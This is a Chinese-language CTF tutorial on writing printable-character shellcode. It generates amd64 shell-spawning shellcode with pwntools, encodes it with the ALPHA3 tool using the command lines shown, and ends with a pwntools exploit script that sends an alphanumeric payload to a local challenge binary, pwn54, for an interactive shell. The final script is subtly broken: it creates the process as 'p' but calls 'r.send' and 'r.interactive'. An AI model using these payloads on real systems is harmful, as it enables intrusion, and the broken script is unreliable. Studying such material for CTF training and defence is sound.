可见字符shellcode

可见字符 shellcode 的简单介绍：

可见字符 shellcode 是一种在某些情况下非常实用的技术，特别是当程序对用户输入的字符串进行限制时。例如在只允许输入可见字符的情况下，就需要使用纯字符的 shellcode。

可见字符 shellcode 的原理：

可见字符 shellcode 的原理是使用纯字符对应的汇编指令来完成 shellcode 的编写。例如：ASCLL 字符’P’对应的汇编指令时 push rax，’Q’对应的指令时 push rcx，以此类推。

可见字符 shellcode 运用示例：

运用方法不难，我们直接用一道题目去解释可见字符 shellcode 的使用：

没有开启 NX，而且可以用 shellcode 栈溢出 shellcode，不过限制了输入的字符串必须可视化

首先我们先生成一个普通的 shellcode，文件名为 sc：

from pwn import *
context.arch='amd64'
sc = shellcraft.sh()
print(asm(sc))

将上述代码保存成 sc.py 程序并运行，> 指向的是保存的输出文件名

python sc.py > shellcode

使用 alpha3 工具将生成的shellcode转换为可见字符shellcode：这里 shellcode 指的是文件名称

python2 ALPHA3.py x64 ascii mixedcase rax --input="./shellcode"

这将生成一个基于rax寄存器的可见字符shellcode。

---

这里补充一点小知识：

python2 - 用 Python 运行脚本

./ALPHA3.py - ALPHA3 工具的脚本文件

x64 - 目标架构是 64 位系统

ascii - 生成 ASCII 编码的 shellcode（可打印字符）

mixedcase - 使用大小写混合的字母（A-Za-z）

rax - 指定 shellcode 的基址寄存器为 RAX（64位寄存器）

--input="shellcode" - 这里的 "shellcode" 是文件名，包含原始的二进制 shellcode

补充一下 32 位可视字符 shellcode 的操作：

# 1. 基本 ASCII 编码（大小写字母）
python ./ALPHA3.py x86 ascii mixedcase eax --input="shellcode.bin"

# 2. 仅大写字母
python ./ALPHA3.py x86 ascii uppercase eax --input="shellcode.bin"

# 3. 仅小写字母
python ./ALPHA3.py x86 ascii lowercase eax --input="shellcode.bin"

# 4. 数字+字母（更广的ASCII范围）
python ./ALPHA3.py x86 ascii alphanumeric eax --input="shellcode.bin"

tip）这里我们可能需要用到工具 alpha3，没有的话可以执行命令下载一下：

git clone https://github.com/TaQini/alpha3.git

---

我们继续往下走，利用 read 函数栈溢出编写shellcode：

from pwn import *
context(arch='amd64', os='linux', log_level='debug')

p = process('./pwn54')
shellcode = 'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'

r.send(shellcode)

r.interactive()

更新: 2026-03-12 11:42:16
原文: https://www.yuque.com/idcm/wnemg9/nnpa7pgoc8f9glar